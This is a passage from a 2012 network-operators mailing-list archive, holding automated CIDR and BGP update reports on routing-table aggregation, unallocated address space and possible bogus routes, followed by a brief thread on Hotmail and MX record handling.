4766 2759 1507 Korea Telecom (KIX) Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet List of Unregistered Origin ASNs (Global) ----------------------------------------- Bad AS Designation Network Transit AS Description 59407 UNALLOCATED 5.134.16.0/21 51167 Giga-Hosting GmbH 59457 UNALLOCATED 5.149.64.0/24 35567 DASTO semtel d.o.o. 59457 UNALLOCATED 5.149.64.0/19 35567 DASTO semtel d.o.o. 59457 UNALLOCATED 5.149.65.0/24 35567 DASTO semtel d.o.o. 59457 UNALLOCATED 5.149.66.0/24 35567 DASTO semtel d.o.o. 59473 UNALLOCATED 5.149.152.0/22 44843 AmsterdamTelecom Ltd 59473 UNALLOCATED 5.149.156.0/23 44843 AmsterdamTelecom Ltd 15132 UNALLOCATED 12.9.150.0/24 7018 AT&T WorldNet Servic 25639 UNALLOCATED 12.41.169.0/24 7018 AT&T WorldNet Servic 13317 UNALLOCATED 12.44.10.0/24 7018 AT&T WorldNet Servic Complete listing at http://thyme.rand.apnic.net/current/data-badAS Prefixes from private and non-routed address space (Global) ----------------------------------------------------------- Prefix Origin AS Description 198.18.0.0/15 14744 Internap Network Services Complete listing at http://thyme.rand.apnic.net/current/data-dsua Advertised Unallocated Addresses -------------------------------- Network Origin AS Description 5.10.8.0/21 57154 Stadtwerke Konstanz GmbH 5.10.40.0/21 12466 BICOS.NET Autonomous System 5.10.48.0/20 29562 Kabel Baden-Wuerttemberg GmbH 5.158.96.0/19 38934 Pride Limited 5.158.200.0/21 23456 32-bit ASN transition 5.158.208.0/21 2914 Verio, Inc. 
5.159.40.0/21 23456 32-bit ASN transition 14.192.0.0/22 45464 Room 201, TGU Bldg 14.192.4.0/22 45464 Room 201, TGU Bldg 14.192.8.0/22 45464 Room 201, TGU Bldg Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA Number of prefixes announced per prefix length (Global) ------------------------------------------------------- /1:0 /2:0 /3:0 /4:0 /5:0 /6:0 /7:0 /8:19 /9:13 /10:28 /11:83 /12:236 /13:475 /14:848 /15:1529 /16:12304 /17:6362 /18:10763 /19:20931 /20:29897 /21:31764 /22:41424 /23:39675 /24:219022 /25:1215 /26:1472 /27:850 /28:162 /29:60 /30:18 /31:0 /32:24 Advertised prefixes smaller than registry allocations ----------------------------------------------------- ASN No of nets Total ann. Description 7029 2773 3412 Windstream Communications Inc 18566 2038 2088 Covad Communications 6389 1864 3383 bellsouth.net, inc. 30036 1339 1404 Mediacom Communications Corp 8402 1292 1595 Corbina telecom 11492 1155 1192 Cable One 22773 1122 1698 Cox Communications, Inc. 6503 1051 1527 AVANTEL, S.A. 1785 1048 1939 PaeTec Communications, Inc. 
7011 930 1191 Citizens Utilities Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos Number of /24s announced per /8 block (Global) ---------------------------------------------- 1:564 2:688 3:1 4:13 5:239 6:3 8:440 12:2008 13:1 14:635 15:11 16:3 17:6 20:24 23:202 24:1796 27:1320 31:1018 32:56 33:2 34:2 36:8 37:672 38:824 39:1 40:134 41:2848 42:158 44:3 46:1551 47:2 49:429 50:569 52:13 54:14 55:8 56:1 57:31 58:983 59:532 60:237 61:1359 62:928 63:2029 64:4241 65:2241 66:4513 67:2021 68:1155 69:3201 70:986 71:520 72:1870 74:2604 75:489 76:335 77:938 78:938 79:492 80:1233 81:948 82:642 83:539 84:511 85:1161 86:451 87:931 88:346 89:1764 90:303 91:5063 92:585 93:1307 94:1564 95:1236 96:401 97:318 98:887 99:39 100:21 101:258 103:1324 105:464 106:115 107:189 108:404 109:1464 110:793 111:943 112:431 113:681 114:667 115:925 116:924 117:737 118:922 119:1236 120:357 121:806 122:1667 123:1156 124:1380 125:1259 128:556 129:185 130:266 131:638 132:298 133:22 134:245 135:61 136:215 137:240 138:342 139:184 140:495 141:254 142:437 143:370 144:496 145:77 146:509 147:288 148:767 149:319 150:153 151:186 152:473 153:176 154:19 155:402 156:222 157:382 158:190 159:626 160:344 161:280 162:383 163:189 164:674 165:412 166:585 167:535 168:956 169:127 170:899 171:147 172:5 173:1736 174:605 175:435 176:574 177:998 178:1652 180:1327 181:113 182:1044 183:207 184:559 186:2044 187:1094 188:1379 189:1584 190:6148 192:6021 193:5431 194:4192 195:3207 196:1207 197:184 198:3682 199:4936 200:5994 201:1980 202:8727 203:8671 204:4392 205:2531 206:2794 207:2831 208:4052 209:3632 210:2771 211:1565 212:2042 213:1801 214:875 215:86 216:5073 217:1565 218:562 219:338 220:1233 221:572 222:335 223:350 End of report From cidr-report at potaroo.net Fri Jul 27 17:00:00 2012 From: cidr-report at potaroo.net (cidr-report at potaroo.net) Date: Fri, 27 Jul 2012 22:00:00 GMT Subject: The Cidr Report Message-ID: <201207272200.q6RM00bc071680@wattle.apnic.net> This report has been generated at Fri Jul 27 
21:13:00 2012 AEST.

The report analyses the BGP Routing Table of AS2.0 router
and generates a report on aggregation potential within the table.

Check http://www.cidr-report.org for a current version of this report.

Recent Table History
        Date      Prefixes    CIDR Agg
        20-07-12    419152      241935
        21-07-12    420802      243450
        22-07-12    420851      242316
        23-07-12    420929      242400
        24-07-12    420469      242764
        25-07-12    420742      242807
        26-07-12    420845      243201
        27-07-12    421258      243595

AS Summary
         41762  Number of ASes in routing system
         17448  Number of ASes announcing only one prefix
          3413  Largest number of prefixes announced by an AS
                AS7029 : WINDSTREAM - Windstream Communications Inc
     114212832  Largest address span announced by an AS (/32s)
                AS4134 : CHINANET-BACKBONE No.31,Jin-rong Street

Aggregation Summary
The algorithm used in this report proposes aggregation only
when there is a precise match using the AS path, so as
to preserve traffic transit policies. Aggregation is also
proposed across non-advertised address space ('holes').

 --- 27Jul12 ---
ASnum    NetsNow NetsAggr  NetGain   % Gain   Description

Table     421768   243593   178175    42.2%   All ASes

AS6389      3382      194     3188    94.3%   BELLSOUTH-NET-BLK - BellSouth.net Inc.
AS17974     2274      459     1815    79.8%   TELKOMNET-AS2-AP PT Telekomunikasi Indonesia
AS7029      3413     1737     1676    49.1%   WINDSTREAM - Windstream Communications Inc
AS18566     2088      417     1671    80.0%   COVAD - Covad Communications Co.
AS28573     2044      472     1572    76.9%   NET Servicos de Comunicao S.A.
AS4766      2764     1295     1469    53.1%   KIXS-AS-KR Korea Telecom
AS10620     2030      606     1424    70.1%   Telmex Colombia S.A.
AS4323      1577      387     1190    75.5%   TWTC - tw telecom holdings, inc.
AS22773     1698      570     1128    66.4%   ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc.
AS1785      1940      816     1124    57.9%   AS-PAETEC-NET - PaeTec Communications, Inc.
AS4755      1613      576     1037    64.3%   TATACOMM-AS TATA Communications formerly VSNL is Leading ISP
AS7303      1458      451     1007    69.1%   Telecom Argentina S.A.
AS7552      1128      226      902    80.0%   VIETEL-AS-AP Vietel Corporation
AS6458       881       45      836    94.9%   Telgua
AS8151      1473      668      805    54.7%   Uninet S.A. de C.V.
AS18101      942      157      785    83.3%   RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI
AS17908      828       60      768    92.8%   TCISL Tata Communications
AS4808      1117      350      767    68.7%   CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
AS9394       908      166      742    81.7%   CRNET CHINA RAILWAY Internet(CRNET)
AS13977      839      123      716    85.3%   CTELCO - FAIRPOINT COMMUNICATIONS, INC.
AS855        694       52      642    92.5%   CANET-ASN-4 - Bell Aliant Regional Communications, Inc.
AS3356      1105      473      632    57.2%   LEVEL3 Level 3 Communications
AS17676      695       75      620    89.2%   GIGAINFRA Softbank BB Corp.
AS2118       632       14      618    97.8%   RELCOM-AS OOO "NPO Relcom"
AS22561     1035      424      611    59.0%   DIGITAL-TELEPORT - Digital Teleport Inc.
AS19262     1001      403      598    59.7%   VZGNI-TRANSIT - Verizon Online LLC
AS4780       834      243      591    70.9%   SEEDNET Digital United Inc.
AS24560     1038      449      589    56.7%   AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
AS3549      1000      437      563    56.3%   GBLX Global Crossing Ltd.
AS4804       653       96      557    85.3%   MPX-AS Microplex PTY LTD

Total      43084    12441    30643    71.1%   Top 30 total

Possible Bogus Routes

        5.159.40.0/21        AS19682 NETWORKRECOVERY Business Recovery Services Limited
        10.86.64.32/30       AS65530 -Private Use AS-
        10.86.64.36/30       AS65530 -Private Use AS-
        10.86.65.32/30       AS65530 -Private Use AS-
        10.86.65.36/30       AS65530 -Private Use AS-
        10.255.255.0/30      AS65530 -Private Use AS-
        10.255.255.4/30      AS65530 -Private Use AS-
        10.255.255.8/30      AS65530 -Private Use AS-
        14.192.0.0/22        AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.4.0/22        AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.8.0/22        AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.12.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.16.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.20.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.24.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.28.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        27.112.114.0/24      AS23884 PROENNET-AS Proimage Engineering and Communication Co.,Ltd.
        41.222.80.0/21       AS37110 moztel-as
        41.223.108.0/22      AS36966 EDL_AS Edgenet AS
        62.61.220.0/24       AS24974 TACHYON-EU Tachyon Europe BV
        62.61.221.0/24       AS24974 TACHYON-EU Tachyon Europe BV
        64.66.32.0/20        AS18864
        66.171.32.0/20       AS705 UUNET - MCI Communications Services, Inc. d/b/a Verizon Business
        66.180.239.0/24      AS35888 VIGNETTE - VIGNETTE CORPORATION
        66.207.32.0/20       AS23011
        66.245.176.0/20      AS19318 NJIIX-AS-1 - NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC
        66.251.128.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.133.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.134.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.136.0/21      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.140.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.141.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.142.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.143.0/24      AS3356 LEVEL3 Level 3 Communications
        69.46.224.0/20       AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers
        69.46.233.0/24       AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers
        69.46.236.0/24       AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers
        70.34.112.0/20       AS27589 MOJOHOST - MOJOHOST
        71.19.134.0/23       AS3313 INET-AS BT Italia S.p.A.
        72.35.224.0/22       AS30097 NUWAVE - NuWave
        72.35.229.0/24       AS30188 TELEVERGENCE - Televergence Solutions Inc.
        72.35.232.0/21       AS30097 NUWAVE - NuWave
        72.44.16.0/20        AS15054 HAMELTRONICS - Hameltronics, LLC
        74.91.48.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.49.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.50.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.51.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.52.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.53.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.54.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.55.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.56.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.57.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.58.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.59.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.60.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.61.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.62.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.63.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.112.96.0/22       AS2828 XO-AS15 - XO Communications
        74.115.124.0/23      AS46540
        74.115.126.0/24      AS11260 EASTLINK-HSI - EastLink
        81.22.64.0/20        AS5511 OPENTRANSIT France Telecom S.A.
        82.101.160.0/19      AS5511 OPENTRANSIT France Telecom S.A.
        100.104.0.0/13       AS286 KPN KPN Internet Backbone
        100.112.0.0/14       AS286 KPN KPN Internet Backbone
        100.116.0.0/15       AS286 KPN KPN Internet Backbone
        110.34.44.0/22       AS12653 COMTONET KB Impuls Hellas S.A.
        116.206.72.0/24      AS6461 MFNX MFN - Metromedia Fiber Network
        116.206.85.0/24      AS6461 MFNX MFN - Metromedia Fiber Network
        116.206.103.0/24     AS6461 MFNX MFN - Metromedia Fiber Network
        117.120.56.0/21      AS4755 TATACOMM-AS TATA Communications formerly VSNL is Leading ISP
        121.46.0.0/16        AS4134 CHINANET-BACKBONE No.31,Jin-rong Street
        142.54.0.0/19        AS23498 CDSI - Cogeco Data Services LP
        172.14.0.0/24        AS57871 ASTELECENTR TeleCentr Ltd.
        172.15.0.0/24        AS57871 ASTELECENTR TeleCentr Ltd.
        172.45.1.0/24        AS3356 LEVEL3 Level 3 Communications
        172.102.0.0/22       AS4812 CHINANET-SH-AP China Telecom (Group)
        172.116.0.0/24       AS7018 ATT-INTERNET4 - AT&T Services, Inc.
        172.120.16.0/21      AS19891 BML-AS Bill Me Later, Inc
        176.123.128.0/19     AS45054 DI-NET-AS Di-Net LLC
        192.0.0.0/24         AS14745 INTERNAP-BLOCK-4 - Internap Network Services Corporation
        195.35.108.0/23      AS8881 VERSATEL Versatel Deutschland GmbH
        198.18.0.0/15        AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation
        198.51.100.0/24      AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation
        200.1.112.0/24       AS29754 GO2TEL GO2TEL.COM INC.
        200.6.49.0/24        AS23148 TERREMARK Terremark
        200.24.73.0/24       AS26061 Equant Colombia
        200.53.0.0/19        AS13878 Diveo do Brasil Telecomunicacoes Ltda
        200.58.248.0/21      AS27849
        200.75.184.0/21      AS14754 Telgua
        200.106.128.0/20     AS3257 TINET-BACKBONE Tinet SpA
        200.115.112.0/20     AS3257 TINET-BACKBONE Tinet SpA
        202.1.224.0/24       AS10097 FLOWCOM Flow Communications 2/541 Kent St Sydney NSW 2000
        202.8.106.0/24       AS9530 SHINSEGAE-AS SHINSEGAE I&C Co., Ltd.
        202.58.113.0/24      AS19161
        202.83.120.0/21      AS37972
        202.83.124.0/24      AS37972
        202.83.125.0/24      AS37972
        202.83.126.0/24      AS37972
        202.94.1.0/24        AS4808 CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
        202.140.128.0/19     AS9583 SIFY-AS-IN Sify Limited
        202.174.125.0/24     AS9498 BBIL-AP BHARTI Airtel Ltd.
        202.176.1.0/24       AS9942 COMINDICO-AP SOUL Converged Communications Australia
        202.179.134.0/24     AS23966 LDN-AS-PK LINKdotNET Telecom Limited
        203.0.113.0/24       AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation
        203.23.1.0/24        AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.24.38.0/24       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.30.127.0/24      AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.86.0/23       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.86.0/24       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.87.0/24       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.188.0/24      AS1221 ASN-TELSTRA Telstra Pty Ltd
        203.142.219.0/24     AS45149
        204.9.116.0/22       AS30097 NUWAVE - NuWave
        204.10.88.0/21       AS3356 LEVEL3 Level 3 Communications
        204.10.92.0/23       AS30097 NUWAVE - NuWave
        204.10.94.0/23       AS30097 NUWAVE - NuWave
        204.14.0.0/21        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        204.14.0.0/24        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        204.14.2.0/24        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        204.14.3.0/24        AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        205.175.214.0/24     AS5583 ORANGE-BUSINESS-SERVICES-BENELUX France Telecom S.A.
        206.197.184.0/24     AS23304 DATOTEL-STL-AS - Datotel LLC, a NetLabs LLC Company
        207.174.131.0/24     AS26116 INDRA - Indra's Net Inc
        207.174.132.0/23     AS26116 INDRA - Indra's Net Inc
        207.174.152.0/23     AS26116 INDRA - Indra's Net Inc
        207.174.154.0/24     AS26116 INDRA - Indra's Net Inc
        207.174.155.0/24     AS26116 INDRA - Indra's Net Inc
        207.174.200.0/24     AS22658 EARTHNET - Earthnet, Inc.
        207.174.248.0/21     AS6653 PRIVATEI - privateI, LLC
        207.231.96.0/19      AS11194 NUNETPA - NuNet Inc.
        208.83.53.0/24       AS40569 YGOMI-AS - Ygomi LLC
        208.93.144.0/21      AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        208.93.151.0/24      AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation
        209.148.64.0/19      AS13773 TELNETCOMM - Telnet Communications
        209.177.64.0/20      AS6461 MFNX MFN - Metromedia Fiber Network
        209.213.0.0/20       AS33005 ELTOPIA - Eltopia.com, LLC
        213.150.202.0/24     AS8513 SKYVISION SkyVision Global Networks Ltd
        213.150.204.0/24     AS29338 AFOL-AS Used by Africaonline Operations
        216.12.160.0/20      AS26627 AS-PILOSOFT - Pilosoft, Inc.
        216.21.160.0/20      AS27876 American Data Networks
        216.146.0.0/19       AS11915 TELWEST-NETWORK-SVCS-STATIC - TEL WEST COMMUNICATIONS LLC
        216.194.160.0/20     AS27876 American Data Networks

Please see http://www.cidr-report.org for the full report

------------------------------------
Copies of this report are mailed to:
  nanog at nanog.org
  eof-list at ripe.net
  apops at apops.net
  routing-wg at ripe.net
  afnog at afnog.org

From cidr-report at potaroo.net  Fri Jul 27 17:00:01 2012
From: cidr-report at potaroo.net (cidr-report at potaroo.net)
Date: Fri, 27 Jul 2012 22:00:01 GMT
Subject: BGP Update Report
Message-ID: <201207272200.q6RM01FE071693@wattle.apnic.net>

BGP Update Report
Interval: 21-Jul-12 -to- 26-Jul-12 (5 days)
Observation Point: BGP Peering with AS131072

TOP 20 Unstable Origin AS
Rank  ASN        Upds   %  Upds/Pfx  AS-Name
 1 - AS1637     39517  1.6%   365.9 -- DNIC-AS-01637 - Headquarters, USAISC
 2 - AS17813    36407  1.4%   267.7 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
 3 - AS8402     36092  1.4%    20.4 -- CORBINA-AS OJSC "Vimpelcom"
 4 - AS47931    25100  1.0%   204.1 -- ALENETWORK A.L.E. COM NETWORK S.R.L
 5 - AS9829     24636  1.0%    18.9 -- BSNL-NIB National Internet Backbone
 6 - AS24560    23244  0.9%    22.4 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
 7 - AS7029     18201  0.7%     5.1 -- WINDSTREAM - Windstream Communications Inc
 8 - AS7552     15306  0.6%    13.5 -- VIETEL-AS-AP Vietel Corporation
 9 - AS13118    14259  0.6%   297.1 -- ASN-YARTELECOM OJSC Rostelecom
10 - AS28573    13041  0.5%     6.3 -- NET Servicos de Comunicao S.A.
11 - AS6458     12662  0.5%    14.3 -- Telgua
12 - AS27738    11509  0.5%    20.7 -- Ecuadortelecom S.A.
13 - AS48277    11273  0.5%   201.3 -- SOREX SOREX MEDIA S.R.L.
14 - AS49074    10768  0.4%   219.8 -- TECHNOLOGICAL SC TECHNOLOGICAL SRL
15 - AS13979    10640  0.4%     3.4 -- ATT-IPFR - AT&T Services, Inc.
16 - AS6389     10419  0.4%     3.1 -- BELLSOUTH-NET-BLK - BellSouth.net Inc.
17 - AS5800     10203  0.4%    39.5 -- DNIC-ASBLK-05800-06055 - DoD Network Information Center
18 - AS18566     9878  0.4%     4.7 -- COVAD - Covad Communications Co.
19 - AS10620     9731  0.4%     4.8 -- Telmex Colombia S.A.
20 - AS8151      9158  0.4%     6.1 -- Uninet S.A. de C.V.

TOP 20 Unstable Origin AS (Updates per announced prefix)
Rank  ASN        Upds   %  Upds/Pfx  AS-Name
 1 - AS16535     4402  0.2%  1467.3 -- ECHOS-3 - Echostar Holding Purchasing Corporation
 2 - AS44410     3241  0.1%  1080.3 -- ENTEKHAB-AS ENTEKHAB INDUSTRIAL GROUP
 3 - AS49072      921  0.0%   921.0 -- APSUARA-AS TCA Apsuara Ltd.
 4 - AS43348     1752  0.1%   876.0 -- TATARINOVA-AS PE Tatarinova Alla Ivanovna
 5 - AS54037      841  0.0%   841.0 -- CAREER-GROUP-INC - CAREER GROUP INC
 6 - AS26184      703  0.0%   703.0 -- ASA-HQAS - American Society of Anesthesiologists
 7 - AS14452     6312  0.2%   701.3 -- IOS-ASN - INTERNET OF THE SANDHILLS
 8 - AS58655     1204  0.1%   602.0 -- SKYTEL6-BD SkyTel Communications Limited
 9 - AS51250      583  0.0%   583.0 -- ITE-PROTON-AS "Information technologies enterprise "Proton" LTD
10 - AS38857     1082  0.0%   541.0 -- ESOFT-TRANSIT-AS-AP e.Soft Technologies Ltd.
11 - AS56588      442  0.0%   442.0 -- EE-IC Estonian Informatics Centre
12 - AS3          440  0.0%   759.0 -- YUPITER-AS Yu-Piter ltd.
13 - AS42806      428  0.0%   428.0 -- TELECOM-AS Telecom Georgia
14 - AS1637     39517  1.6%   365.9 -- DNIC-AS-01637 - Headquarters, USAISC
15 - AS29398      327  0.0%   327.0 -- PETROBALTIC "Petrobaltic" S.A.
16 - AS13118    14259  0.6%   297.1 -- ASN-YARTELECOM OJSC Rostelecom
17 - AS23007      888  0.0%   296.0 -- Universidad de Los Andes
18 - AS4          296  0.0%    51.0 -- COMUNICALO DE MEXICO S.A. DE C.V
19 - AS27890      576  0.0%   288.0 -- Universidad de Oriente
20 - AS57201      281  0.0%   281.0 -- EDF-AS Estonian Defence Forces

TOP 20 Unstable Prefixes
Rank  Prefix             Upds   %  Origin AS  -- AS Name
 1 - 109.161.64.0/19    13690  0.5%   AS13118 -- ASN-YARTELECOM OJSC Rostelecom
 2 - 59.176.0.0/14       7722  0.3%   AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
 3 - 182.64.0.0/16       7432  0.3%   AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
 4 - 122.161.0.0/16      7428  0.3%   AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
 5 - 200.46.0.0/19       7057  0.3%   AS21599 -- NETDIRECT S.A.
 6 - 59.177.0.0/16       5820  0.2%   AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
 7 - 67.47.194.0/23      4396  0.2%   AS16535 -- ECHOS-3 - Echostar Holding Purchasing Corporation
 8 - 202.56.215.0/24     4324  0.2%   AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
 9 - 59.177.0.0/18       4155  0.2%   AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
10 - 123.252.208.0/24    3922  0.1%   AS17762 -- HTIL-TTML-IN-AP Tata Teleservices Maharashtra Ltd
11 - 59.177.48.0/20      3872  0.1%   AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
12 - 139.139.19.0/24     3828  0.1%   AS1562  -- DNIC-ASBLK-01550-01601 - DoD Network Information Center
13 - 194.63.9.0/24       3636  0.1%   AS1273  -- CW Cable and Wireless Worldwide plc
14 - 65.82.30.0/24       3007  0.1%   AS6197  -- BATI-ATL - BellSouth Network Solutions, Inc
15 - 69.38.178.0/24      2960  0.1%   AS19406 -- TWRS-MA - Towerstream I, Inc.
16 - 59.177.0.0/19       2234  0.1%   AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
17 - 115.170.128.0/17 2192 0.1% AS4847 -- CNIX-AP China Networks Inter-Exchange 18 - 59.177.64.0/18 2106 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 19 - 202.159.215.0/24 2006 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. 20 - 59.177.144.0/20 2006 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd. Details at http://bgpupdates.potaroo.net ------------------------------------ Copies of this report are mailed to: nanog at nanog.org eof-list at ripe.net apops at apops.net routing-wg at ripe.net afnog at afnog.org From dot at dotat.at Fri Jul 27 18:16:48 2012 From: dot at dotat.at (Tony Finch) Date: Sat, 28 Jul 2012 00:16:48 +0100 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: References: <20120726071441.GA11199@metron.com> Message-ID: <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> That would be a seriously broken violation of the SMTP specification. Tony. -- f.anthony.n.finch http://dotat.at/ On 26 Jul 2012, at 08:21, Suresh Ramasubramanian wrote: > If the MX records are not responsive / timing out, they might be falling > back to the A record. > > On Thu, Jul 26, 2012 at 12:44 PM, Lou Katz wrote: > >> One of my users has reported incoming mail failures, which I finally >> tracked down. It turned out that Hotmail has seen fit to send the mail >> to his domain's A record machine, despite the fact that he has valid MX >> records. >> >> The A record points to my webserver, which does not normally accept mail >> for anyone. The mail server MX records are to an entirely different >> machine. >> > > > > -- > Suresh Ramasubramanian (ops.lists at gmail.com) From mysidia at gmail.com Fri Jul 27 20:00:30 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Fri, 27 Jul 2012 20:00:30 -0500 Subject: Is Hotmail in the habit of ignoring MX records? 
In-Reply-To: <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> References: <20120726071441.GA11199@metron.com> <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> Message-ID: On 7/27/12, Tony Finch wrote: > That would be a seriously broken violation of the SMTP specification. I would definitely agree it would be quite broken behavior, but you know, I never said Hotmail's processing wasn't broken -- only that they seem to honor MX records in the common case. If you are doing something unusual like "mail MX bla bla" I would say you can't rule that out as a possible cause, just because some RFC suggests it should be OK. The spec does say that you're not allowed to chain MX records. But i'm not so sure that the specification actually prohibits a SMTP server from doing that, if someone does try to chain MX records. it may also be out of spec to have a "MX" record point to a dns label that a MX record exists for in the first place. > Tony. > -- > f.anthony.n.finch http://dotat.at/ -- -JH From dmiller at tiggee.com Fri Jul 27 20:40:18 2012 From: dmiller at tiggee.com (David Miller) Date: Fri, 27 Jul 2012 21:40:18 -0400 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: References: <20120726071441.GA11199@metron.com> <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> Message-ID: <50134302.2010800@tiggee.com> On 7/27/2012 9:00 PM, Jimmy Hess wrote: > On 7/27/12, Tony Finch wrote: >> That would be a seriously broken violation of the SMTP specification. > I would definitely agree it would be quite broken behavior, but you > know, I never said Hotmail's processing wasn't broken -- only that > they seem to honor MX records in the common case. If you are doing > something unusual like "mail MX bla bla" > > I would say you can't rule that out as a possible cause, just because > some RFC suggests it should be OK. > > The spec does say that you're not allowed to chain MX records. 
But > i'm not so sure that the specification actually prohibits a SMTP > server from doing that, if someone > does try to chain MX records. > > it may also be out of spec to have a "MX" record point to a > dns label that a MX record exists for in the first place. MX records don't "chain". If they did, then example.com. 1800 IN MX 10 example.com. would be an infinite loop. This isn't an infinite loop and is instead a perfectly valid configuration. If you made a DNS query for the MX records for example.com you would get back an answer that might include: ;; ANSWER SECTION: example.com. 1800 IN MX 10 example.com. ;; ADDITIONAL SECTION: example.com. 1800 IN A 10.10.10.10 >From RFC 1035: 3.3.9. MX RDATA format +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ | PREFERENCE | +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ / EXCHANGE / / / +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+ where: PREFERENCE A 16 bit integer which specifies the preference given to this RR among others at the same owner. Lower values are preferred. EXCHANGE A which specifies a host willing to act as a mail exchange for the owner name. MX records cause type A additional section processing for the host specified by EXCHANGE. The use of MX RRs is explained in detail in [RFC-974]. -DMM From mjwise at kapu.net Fri Jul 27 21:30:40 2012 From: mjwise at kapu.net (Michael J Wise) Date: Fri, 27 Jul 2012 19:30:40 -0700 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <50134302.2010800@tiggee.com> References: <20120726071441.GA11199@metron.com> <9234A38C-7DDE-4A3D-B859-01E7D94447D8@dotat.at> <50134302.2010800@tiggee.com> Message-ID: <25F0B21A-0319-45E3-9DBF-9906CB77AC6C@kapu.net> On Jul 27, 2012, at 6:40 PM, David Miller wrote: > MX records don't "chain". But they do, "Expand". And I can think of a way whereby if an MX record referenced itself, *AND* included something extra ? (did you see the something extra?) 
